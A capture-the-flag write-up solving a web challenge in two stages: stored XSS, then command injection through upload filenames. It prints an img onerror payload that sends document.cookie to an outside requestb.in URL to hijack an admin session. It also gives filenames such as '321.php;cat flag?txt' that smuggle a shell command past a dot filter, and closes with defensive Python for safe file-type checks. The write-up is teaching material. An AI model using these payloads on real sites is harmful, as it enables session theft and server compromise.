Chall:
I found this amazing blog about Iceland! Did I ever tell you that I love Iceland? It seems to be made from scratch by a single guy; although it is impressive, he doesn’t seem to have much experience with web programming. Can you see if you can find any vulnerabilities to pwn his machine?
This is a nice website; first we have to log in to access some of its functions.
This chall has two stages:
Stage 1: Cross-Site Scripting
Once logged in, we get a session cookie:
session=eyJ1c2VyIjozOX0.CqHuQA._9DBnFghkXsPrugp8vYM5pYUP-8 (mine)
There is also a comment area with a report button, so I was thinking about XSS.
So construct the payload, post it, and report it to the admin to leak his cookie via stored XSS:
<img src=x onerror=this.src='http://requestb.in/1k4cnub1?z='+document.cookie>
Thanks, admin; I got this gift:
Hijack the session with it:
WE ADMIN NOW!!!
Stage 2: From Upload to Command Injection
When I upload a PHP file:
And a zip file:
Even a … binary file:
So what does it all mean? A little googling tells you this website uses the Linux file command to determine the type of our uploaded file:
file 123php
Since the filename is concatenated into that command string, command injection is possible. Let's make a file named 123.php;ls :
Since they filter the dot (.), we can replace it with a question mark (?), which the shell expands as a single-character glob. The new file name is “321.php;cat flag?txt”. Easy, huh?
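The root cause of stage 2 is a filename concatenated into a shell command string. Below is an added example (not the challenge's code) contrasting that pattern with a fix: an allowlist on the stored name and a shell-free argument vector for file. The upload directory path and the single-character dot blacklist behaviour are assumptions made for illustration.

```python
import re
import shlex
import subprocess
from pathlib import Path

# Allowlist for stored upload names: letters, digits, '_' or '-', plus one
# optional extension. It rejects ';', '?', '/', spaces and anything else the
# shell or a glob could interpret, rather than blacklisting one character.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}(\.[A-Za-z0-9]{1,10})?$")


def is_safe_upload_name(name: str) -> bool:
    """True only if the name matches the allowlist (no path or shell metacharacters)."""
    return bool(_SAFE_NAME.fullmatch(name))


def vulnerable_command(name: str) -> str:
    """The bug pattern: the filename is concatenated into a shell command string."""
    return "file " + name  # assumed to be run with shell=True in the vulnerable app


def shell_sees(command: str) -> list:
    """Tokenise a command string the way a POSIX shell would split it.

    Shown only to make the defect visible: a ';' inside the name is not part
    of the argument, it becomes a command separator.
    """
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


def file_argv(upload_dir: str, name: str) -> list:
    """Argument vector for `file` that never passes through a shell.

    Raises ValueError for names outside the allowlist. '--' stops option
    parsing so a name starting with '-' is not read as a flag, and the path
    is anchored inside upload_dir.
    """
    if not is_safe_upload_name(name):
        raise ValueError("rejected upload name: %r" % name)
    path = Path(upload_dir) / name
    return ["file", "--brief", "--", str(path)]


def detect_type(upload_dir: str, name: str) -> str:
    """Run `file` on a validated upload with an argv list, never shell=True."""
    result = subprocess.run(file_argv(upload_dir, name), capture_output=True,
                            text=True, check=True)
    return result.stdout.strip()
```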
Wow, thank you! I was wondering how to do it, haha 😀